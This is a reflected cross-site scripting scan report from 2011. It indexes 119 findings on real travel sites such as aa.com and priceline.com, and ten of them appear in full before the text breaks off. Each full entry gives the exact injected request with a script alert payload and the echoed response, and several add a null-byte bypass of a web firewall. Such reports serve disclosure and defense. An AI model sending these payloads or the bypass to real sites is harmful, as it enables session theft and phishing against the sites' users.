XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 11132011-01

Report generated by XSS.CX at Sun Nov 13 09:08:19 CST 2011.




1. Cross-site scripting (reflected)

1.1. http://joinus.aa.com/ [name of an arbitrarily supplied request parameter]

1.2. http://tickets.priceline.com/affiliates/default.asp [name of an arbitrarily supplied request parameter]

1.3. http://tickets.priceline.com/affiliates/default.asp [plf parameter]

1.4. http://tickets.priceline.com/customerservice/faq/howitworks/air.asp [name of an arbitrarily supplied request parameter]

1.5. http://tickets.priceline.com/customerservice/faq/howitworks/air.asp [plf parameter]

1.6. http://tickets.priceline.com/mediakit/about.asp [name of an arbitrarily supplied request parameter]

1.7. http://tickets.priceline.com/mediakit/about.asp [plf parameter]

1.8. http://tickets.priceline.com/privacypolicy/adware_spyware_policy.asp [name of an arbitrarily supplied request parameter]

1.9. http://tickets.priceline.com/privacypolicy/adware_spyware_policy.asp [plf parameter]

1.10. http://tickets.priceline.com/privacypolicy/privacypolicy.asp [name of an arbitrarily supplied request parameter]

1.11. http://tickets.priceline.com/privacypolicy/privacypolicy.asp [plf parameter]

1.12. http://tickets.priceline.com/travel/airlines/lang/en-us/air_leavebehind.asp [lbp parameter]

1.13. http://tickets.priceline.com/travel/airlines/lang/en-us/details_ret_bk.asp [name of an arbitrarily supplied request parameter]

1.14. http://tickets.priceline.com/travel/airlines/lang/en-us/details_ret_bk.asp [path parameter]

1.15. http://tickets.priceline.com/travel/airlines/lang/en-us/details_ret_bk.asp [plf parameter]

1.16. http://travel.travelocity.com/trips/UpdateXFactorSelect.do [jsessionid parameter]

1.17. https://www.aa.com/dwr/call/plaincall/HomePageUtils.reportImpression.dwr [batchId parameter]

1.18. https://www.aa.com/dwr/call/plaincall/HomePageUtils.reportImpression.dwr [c0-id parameter]

1.19. https://www.aa.com/dwr/call/plaincall/HomePageUtils.reportImpression.dwr [c0-scriptName parameter]

1.20. https://www.aa.com/dwr/call/plaincall/HomePageUtils.reportImpression.dwr [callCount parameter]

1.21. https://www.aa.com/dwr/interface/CancelVPNRAjaxUtil.js [REST URL parameter 3]

1.22. https://www.aa.com/dwr/interface/CountryLanguageSelectAjaxUtils.js [REST URL parameter 3]

1.23. https://www.aa.com/dwr/interface/HomePageMyReservationsAjaxAction.js [REST URL parameter 3]

1.24. https://www.aa.com/dwr/interface/HomePageMyReservationsAjaxAction.js [REST URL parameter 3]

1.25. https://www.aa.com/dwr/interface/HomePageUtils.js [REST URL parameter 3]

1.26. https://www.aa.com/dwr/interface/SmartSuggestAjaxUtils.js [REST URL parameter 3]

1.27. https://www.aa.com/homePage.do [locale parameter]

1.28. https://www.aa.com/i18n/aboutUs/customerCommitment/main.jsp [anchorEvent parameter]

1.29. https://www.aa.com/i18n/aboutUs/customerCommitment/main.jsp [from parameter]

1.30. https://www.aa.com/i18n/aboutUs/customerCommitment/main.jsp [name of an arbitrarily supplied request parameter]

1.31. https://www.aa.com/i18n/amrcorp/newsroom/main.jsp [REST URL parameter 1]

1.32. https://www.aa.com/i18n/productsGifts/giftCard.jsp [anchorEvent parameter]

1.33. https://www.aa.com/i18n/productsGifts/giftCard.jsp [from parameter]

1.34. https://www.aa.com/i18n/productsGifts/giftCard.jsp [name of an arbitrarily supplied request parameter]

1.35. https://www.aa.com/i18n/reservations/paymentOptions/cashPayments.jsp [from parameter]

1.36. https://www.aa.com/i18n/reservations/paymentOptions/cashPayments.jsp [name of an arbitrarily supplied request parameter]

1.37. https://www.aa.com/i18n/reservations/paymentOptions/creditDebitCards.jsp [from parameter]

1.38. https://www.aa.com/i18n/reservations/paymentOptions/creditDebitCards.jsp [name of an arbitrarily supplied request parameter]

1.39. https://www.aa.com/i18n/reservations/paymentOptions/electronicChecks.jsp [from parameter]

1.40. https://www.aa.com/i18n/reservations/paymentOptions/electronicChecks.jsp [name of an arbitrarily supplied request parameter]

1.41. https://www.aa.com/i18n/reservations/paymentOptions/main.jsp [from parameter]

1.42. https://www.aa.com/i18n/reservations/paymentOptions/main.jsp [name of an arbitrarily supplied request parameter]

1.43. https://www.aa.com/i18n/reservations/paymentOptions/payPal.jsp [from parameter]

1.44. https://www.aa.com/i18n/reservations/paymentOptions/payPal.jsp [name of an arbitrarily supplied request parameter]

1.45. https://www.aa.com/i18n/travelInformation/duringFlight/cabinComfort.jsp [anchorEvent parameter]

1.46. https://www.aa.com/i18n/travelInformation/duringFlight/cabinComfort.jsp [from parameter]

1.47. https://www.aa.com/i18n/travelInformation/duringFlight/cabinComfort.jsp [name of an arbitrarily supplied request parameter]

1.48. https://www.aa.com/i18n/travelInformation/duringFlight/dining/dining.jsp [anchorEvent parameter]

1.49. https://www.aa.com/i18n/travelInformation/duringFlight/dining/dining.jsp [from parameter]

1.50. https://www.aa.com/i18n/travelInformation/duringFlight/dining/dining.jsp [name of an arbitrarily supplied request parameter]

1.51. https://www.aa.com/i18n/travelInformation/duringFlight/entertainment/main.jsp [anchorEvent parameter]

1.52. https://www.aa.com/i18n/travelInformation/duringFlight/entertainment/main.jsp [from parameter]

1.53. https://www.aa.com/i18n/travelInformation/duringFlight/entertainment/main.jsp [name of an arbitrarily supplied request parameter]

1.54. https://www.aa.com/i18n/travelInformation/duringFlight/onboardTechnology.jsp [anchorEvent parameter]

1.55. https://www.aa.com/i18n/travelInformation/duringFlight/onboardTechnology.jsp [from parameter]

1.56. https://www.aa.com/i18n/travelInformation/duringFlight/onboardTechnology.jsp [name of an arbitrarily supplied request parameter]

1.57. https://www.aa.com/i18n/travelInformation/specialAssistance/childrenTraveling.jsp [anchorEvent parameter]

1.58. https://www.aa.com/i18n/travelInformation/specialAssistance/childrenTraveling.jsp [from parameter]

1.59. https://www.aa.com/i18n/travelInformation/specialAssistance/childrenTraveling.jsp [name of an arbitrarily supplied request parameter]

1.60. https://www.aa.com/i18n/travelInformation/specialAssistance/healthAndWellbeing.jsp [anchorEvent parameter]

1.61. https://www.aa.com/i18n/travelInformation/specialAssistance/healthAndWellbeing.jsp [from parameter]

1.62. https://www.aa.com/i18n/travelInformation/specialAssistance/healthAndWellbeing.jsp [name of an arbitrarily supplied request parameter]

1.63. https://www.aa.com/i18n/travelInformation/specialAssistance/travelingWhilePregnant.jsp [anchorEvent parameter]

1.64. https://www.aa.com/i18n/travelInformation/specialAssistance/travelingWhilePregnant.jsp [from parameter]

1.65. https://www.aa.com/i18n/travelInformation/specialAssistance/travelingWhilePregnant.jsp [name of an arbitrarily supplied request parameter]

1.66. https://www.aa.com/i18n/travelInformation/specialAssistance/travelingWithPets.jsp [anchorEvent parameter]

1.67. https://www.aa.com/i18n/travelInformation/specialAssistance/travelingWithPets.jsp [from parameter]

1.68. https://www.aa.com/i18n/travelInformation/specialAssistance/travelingWithPets.jsp [name of an arbitrarily supplied request parameter]

1.69. https://www.aa.com/i18n/travelInformation/tickets/main.jsp [anchorEvent parameter]

1.70. https://www.aa.com/i18n/travelInformation/tickets/main.jsp [from parameter]

1.71. https://www.aa.com/i18n/travelInformation/tickets/main.jsp [name of an arbitrarily supplied request parameter]

1.72. https://www.aa.com/i18n/urls/rss.jsp [from parameter]

1.73. https://www.aa.com/i18n/urls/rss.jsp [name of an arbitrarily supplied request parameter]

1.74. https://www.aa.com/i18n/urls/westernunion.jsp [from parameter]

1.75. https://www.aa.com/i18n/urls/westernunion.jsp [name of an arbitrarily supplied request parameter]

1.76. https://www.aa.com/i18n/utility/evoucher.jsp [from parameter]

1.77. https://www.aa.com/i18n/utility/evoucher.jsp [name of an arbitrarily supplied request parameter]

1.78. https://www.aa.com/i18n/utility/siteMap/siteMap.jsp [name of an arbitrarily supplied request parameter]

1.79. https://www.aa.com/login/loginAccess.do [bookingPathStateId parameter]

1.80. https://www.aa.com/login/loginAccess.do [marketId parameter]

1.81. https://www.aa.com/login/loginAccess.do [name of an arbitrarily supplied request parameter]

1.82. https://www.aa.com/login/loginAccess.do [previousPage parameter]

1.83. https://www.aa.com/login/loginAccess.do [uri parameter]

1.84. https://www.aa.com/reservation/awardFlightSearchAccess.do [anchorEvent parameter]

1.85. https://www.aa.com/reservation/awardFlightSearchAccess.do [from parameter]

1.86. https://www.aa.com/reservation/awardFlightSearchAccess.do [name of an arbitrarily supplied request parameter]

1.87. https://www.aa.com/reservation/flightCheckInViewReservationsAccess.do [anchorEvent parameter]

1.88. https://www.aa.com/reservation/flightCheckInViewReservationsAccess.do [name of an arbitrarily supplied request parameter]

1.89. https://www.aa.com/reservation/multiCitySearchAccess.do [anchorEvent parameter]

1.90. https://www.aa.com/reservation/multiCitySearchAccess.do [from parameter]

1.91. https://www.aa.com/reservation/multiCitySearchAccess.do [name of an arbitrarily supplied request parameter]

1.92. https://www.aa.com/reservation/multiCitySearchAccess.do [name of an arbitrarily supplied request parameter]

1.93. https://www.aa.com/reservation/oneWaySearchAccess.do [anchorEvent parameter]

1.94. https://www.aa.com/reservation/oneWaySearchAccess.do [from parameter]

1.95. https://www.aa.com/reservation/oneWaySearchAccess.do [name of an arbitrarily supplied request parameter]

1.96. https://www.aa.com/reservation/reservationsHomeAccess.do [from parameter]

1.97. https://www.aa.com/reservation/reservationsHomeAccess.do [name of an arbitrarily supplied request parameter]

1.98. https://www.aa.com/reservation/roundTripSearchAccess.do [anchorEvent parameter]

1.99. https://www.aa.com/reservation/roundTripSearchAccess.do [anchorLocation parameter]

1.100. https://www.aa.com/reservation/roundTripSearchAccess.do [from parameter]

1.101. https://www.aa.com/reservation/roundTripSearchAccess.do [name of an arbitrarily supplied request parameter]

1.102. https://www.aa.com/reservation/roundTripSearchAccess.do [promoCode parameter]

1.103. https://www.aa.com/reservation/roundTripSearchAccess.do [url parameter]

1.104. https://www.aa.com/reservation/searchFlightsSubmit.do [name of an arbitrarily supplied request parameter]

1.105. https://www.aa.com/seatmap/viewSeatsAccess.do [from parameter]

1.106. https://www.aa.com/seatmap/viewSeatsAccess.do [name of an arbitrarily supplied request parameter]

1.107. https://www.aa.com/utilities/BookCar.jsp [src parameter]

1.108. http://www.igougo.com/ [name of an arbitrarily supplied request parameter]

1.109. http://www.lastminute.de/de_DE/lmn2/travel/kombi/fh/new.do [REST URL parameter 1]

1.110. http://www.lastminute.de/de_DE/lmn2/travel/kombi/fh/new.do [REST URL parameter 3]

1.111. http://www.lastminute.de/de_DE/lmn2/travel/kombi/fh/new.do [REST URL parameter 4]

1.112. http://www.lastminute.de/de_DE/lmn2/travel/kombi/fh/new.do [REST URL parameter 5]

1.113. http://www.oneworld.com/ [name of an arbitrarily supplied request parameter]

1.114. http://www.pronto.com/ [name of an arbitrarily supplied request parameter]

1.115. http://www.reisefeber.no/no/package_tours [REST URL parameter 1]

1.116. http://www.reisefeber.no/no/package_tours [REST URL parameter 2]

1.117. http://www.travel-ticker.com/category.jsp [categoryName parameter]

1.118. http://travel.travelocity.com/trips/SelectHotel.do [tyrg1st cookie]

1.119. https://www.aa.com/homePage.do [JSESSIONID cookie]



1. Cross-site scripting (reflected)
There are 119 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://joinus.aa.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://joinus.aa.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55156"><script>alert(1)</script>595b0cfe751 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?55156"><script>alert(1)</script>595b0cfe751=1 HTTP/1.1
Host: joinus.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sun, 13 Nov 2011 13:33:21 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: .ASPXANONYMOUS=JFtNpprYzAEkAAAAODBhN2NlNDUtZjEyYi00NjViLTkwYjAtOTA4NDA1YWMwMDFj0; expires=Sun, 22-Jan-2012 00:13:21 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 19713
Connection: Close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head id="Head
...[SNIP]...
<a href="/uso-american-airlines?55156"><script>alert(1)</script>595b0cfe751=1">
...[SNIP]...

1.2. http://tickets.priceline.com/affiliates/default.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tickets.priceline.com
Path:   /affiliates/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69805"><script>alert(1)</script>88b9717e2ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /affiliates/default.asp?69805"><script>alert(1)</script>88b9717e2ae=1 HTTP/1.1
Host: tickets.priceline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 13 Nov 2011 13:36:23 GMT
Server: Microsoft-IIS/6.0
Content-Length: 33297
Content-Type: text/html
Expires: Sun, 13 Nov 2011 13:36:22 GMT
Set-Cookie: PSessKey=701410AC711510AC20111113133622986161309442; domain=.priceline.com; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>

<title>
Travel Affiliate Programs from Priceline | Priceline.co
...[SNIP]...
<a href="?69805"><script>alert(1)</script>88b9717e2ae=1&dbg=DF7C589E3F2C2C48CF0512DFBD78F3B201215939E1B6F8063B772279B72E8E18A5E7F368CFFBA3D57A979FF05B86AF22B88E626BB6A0981766D680E6799D48E2F5EFD332C9851B34BE09689168DDE73555C45870D0EFCC2E7EA78B760EF006E539
...[SNIP]...

1.3. http://tickets.priceline.com/affiliates/default.asp [plf parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tickets.priceline.com
Path:   /affiliates/default.asp

Issue detail

The value of the plf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00e5606"><script>alert(1)</script>e5e4f217810 was submitted in the plf parameter. This input was echoed as e5606"><script>alert(1)</script>e5e4f217810 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /affiliates/default.asp?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln%00e5606"><script>alert(1)</script>e5e4f217810 HTTP/1.1
Host: tickets.priceline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 13 Nov 2011 13:36:29 GMT
Server: Microsoft-IIS/6.0
Content-Length: 30487
Content-Type: text/html
Expires: Sun, 13 Nov 2011 13:36:29 GMT
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>

<title>
Travel Affiliate Programs from Priceline | Priceline.co
...[SNIP]...
<a href="?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln%00e5606"><script>alert(1)</script>e5e4f217810&dbg=B3DA697EF19D0D07DF7C589E3F2C2C4801215939E1B6F806F86FBC004F076F7597B8D6C1CA19DEB1411FF4D73CC4E70CB88E626BB6A0981766D680E6799D48E2F5EFD332C9851B34BE09689168DDE73555C45870D0EFCC2E7EA78B760EF006E53924
...[SNIP]...

1.4. http://tickets.priceline.com/customerservice/faq/howitworks/air.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tickets.priceline.com
Path:   /customerservice/faq/howitworks/air.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfd02"><script>alert(1)</script>39b1db408e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /customerservice/faq/howitworks/air.asp?cfd02"><script>alert(1)</script>39b1db408e2=1 HTTP/1.1
Host: tickets.priceline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 13 Nov 2011 13:36:16 GMT
Server: Microsoft-IIS/6.0
Content-Length: 28869
Content-Type: text/html
Expires: Sun, 13 Nov 2011 13:36:16 GMT
Set-Cookie: PSessKey=701410AC711510AC2011111313361648ccc1291841; domain=.priceline.com; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html lang="en">
<head>

<title>
Priceline.com - Travel, airline tickets, cheap flights, hotels, hotel rooms, rental cars, car r
...[SNIP]...
<a href="?cfd02"><script>alert(1)</script>39b1db408e2=1&dbg=DF7C589E3F2C2C48CF0512DFBD78F3B201215939E1B6F806B047BC7F76785CC4E24B59AD7FF49AD3891D58C9169BC3D4B88E626BB6A0981766D680E6799D48E2F5EFD332C9851B34BE09689168DDE73555C45870D0EFCC2E7EA78B760EF006E539
...[SNIP]...

1.5. http://tickets.priceline.com/customerservice/faq/howitworks/air.asp [plf parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tickets.priceline.com
Path:   /customerservice/faq/howitworks/air.asp

Issue detail

The value of the plf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d3957"><script>alert(1)</script>ade352f47a2 was submitted in the plf parameter. This input was echoed as d3957"><script>alert(1)</script>ade352f47a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /customerservice/faq/howitworks/air.asp?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln%00d3957"><script>alert(1)</script>ade352f47a2 HTTP/1.1
Host: tickets.priceline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 13 Nov 2011 13:36:24 GMT
Server: Microsoft-IIS/6.0
Content-Length: 25405
Content-Type: text/html
Expires: Sun, 13 Nov 2011 13:36:24 GMT
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html lang="en">
<head>

<title>
Priceline.com - Travel, airline tickets, cheap flights, hotels, hotel rooms, rental cars, car r
...[SNIP]...
<a href="?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln%00d3957"><script>alert(1)</script>ade352f47a2&dbg=B3DA697EF19D0D07DF7C589E3F2C2C4801215939E1B6F806F86FBC004F076F7597B8D6C1CA19DEB1411FF4D73CC4E70CB88E626BB6A0981766D680E6799D48E2F5EFD332C9851B34BE09689168DDE73555C45870D0EFCC2E7EA78B760EF006E53924
...[SNIP]...

1.6. http://tickets.priceline.com/mediakit/about.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tickets.priceline.com
Path:   /mediakit/about.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 631f9"><script>alert(1)</script>30158527445 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediakit/about.asp?631f9"><script>alert(1)</script>30158527445=1 HTTP/1.1
Host: tickets.priceline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 13 Nov 2011 13:36:22 GMT
Server: Microsoft-IIS/6.0
Content-Length: 19427
Content-Type: text/html
Set-Cookie: PSessKey=701410AC711510AC20111113133622876151300138; domain=.priceline.com; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html lang="en">
<head>

<title>
Priceline.com - Travel, airline tickets, cheap flights, hotels, hotel rooms, rental cars, car r
...[SNIP]...
<a href="?631f9"><script>alert(1)</script>30158527445=1&dbg=DF7C589E3F2C2C48CF0512DFBD78F3B201215939E1B6F8067542839926CEA7DEB9BDCECC2748D0F347C4168E09359AE0B88E626BB6A0981766D680E6799D48E2F5EFD332C9851B34BE09689168DDE73555C45870D0EFCC2E7EA78B760EF006E539
...[SNIP]...

1.7. http://tickets.priceline.com/mediakit/about.asp [plf parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tickets.priceline.com
Path:   /mediakit/about.asp

Issue detail

The value of the plf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f41d3"><script>alert(1)</script>e2c0178b28d was submitted in the plf parameter. This input was echoed as f41d3"><script>alert(1)</script>e2c0178b28d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /mediakit/about.asp?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln%00f41d3"><script>alert(1)</script>e2c0178b28d HTTP/1.1
Host: tickets.priceline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 13 Nov 2011 13:36:30 GMT
Server: Microsoft-IIS/6.0
Content-Length: 16642
Content-Type: text/html
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html lang="en">
<head>

<title>
Priceline.com - Travel, airline tickets, cheap flights, hotels, hotel rooms, rental cars, car r
...[SNIP]...
<a href="?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln%00f41d3"><script>alert(1)</script>e2c0178b28d&dbg=B3DA697EF19D0D07DF7C589E3F2C2C4801215939E1B6F806F86FBC004F076F7597B8D6C1CA19DEB1411FF4D73CC4E70CB88E626BB6A0981766D680E6799D48E2F5EFD332C9851B34BE09689168DDE73555C45870D0EFCC2E7EA78B760EF006E53924
...[SNIP]...

1.8. http://tickets.priceline.com/privacypolicy/adware_spyware_policy.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tickets.priceline.com
Path:   /privacypolicy/adware_spyware_policy.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27f3f"><script>alert(1)</script>cbecf3117c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /privacypolicy/adware_spyware_policy.asp?27f3f"><script>alert(1)</script>cbecf3117c1=1 HTTP/1.1
Host: tickets.priceline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 13 Nov 2011 13:36:19 GMT
Server: Microsoft-IIS/6.0
Content-Length: 30154
Content-Type: text/html
Set-Cookie: PSessKey=701410AC711510AC201111131336189960a1303066; domain=.priceline.com; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html lang="en">
<head>

<title>
Priceline.com - Travel, airline tickets, cheap flights, hotels, hotel rooms, rental cars, car r
...[SNIP]...
<a href="?27f3f"><script>alert(1)</script>cbecf3117c1=1&dbg=DF7C589E3F2C2C48CF0512DFBD78F3B201215939E1B6F8066C11E7D83D308189A0189F90ED297A5DA9FB406BF14B3769B88E626BB6A0981766D680E6799D48E2F5EFD332C9851B34BE09689168DDE73555C45870D0EFCC2E7EA78B760EF006E539
...[SNIP]...

1.9. http://tickets.priceline.com/privacypolicy/adware_spyware_policy.asp [plf parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tickets.priceline.com
Path:   /privacypolicy/adware_spyware_policy.asp

Issue detail

The value of the plf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00e8976"><script>alert(1)</script>3a9159f2321 was submitted in the plf parameter. This input was echoed as e8976"><script>alert(1)</script>3a9159f2321 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /privacypolicy/adware_spyware_policy.asp?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln%00e8976"><script>alert(1)</script>3a9159f2321 HTTP/1.1
Host: tickets.priceline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 13 Nov 2011 13:36:27 GMT
Server: Microsoft-IIS/6.0
Content-Length: 26689
Content-Type: text/html
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html lang="en">
<head>

<title>
Priceline.com - Travel, airline tickets, cheap flights, hotels, hotel rooms, rental cars, car r
...[SNIP]...
<a href="?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln%00e8976"><script>alert(1)</script>3a9159f2321&dbg=B3DA697EF19D0D07DF7C589E3F2C2C4801215939E1B6F806F86FBC004F076F7597B8D6C1CA19DEB1411FF4D73CC4E70CB88E626BB6A0981766D680E6799D48E2F5EFD332C9851B34BE09689168DDE73555C45870D0EFCC2E7EA78B760EF006E53924
...[SNIP]...

1.10. http://tickets.priceline.com/privacypolicy/privacypolicy.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tickets.priceline.com
Path:   /privacypolicy/privacypolicy.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3f4a"><script>alert(1)</script>618595210a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /privacypolicy/privacypolicy.asp?b3f4a"><script>alert(1)</script>618595210a8=1 HTTP/1.1
Host: tickets.priceline.com
Accept: */*
Accept-Language: en
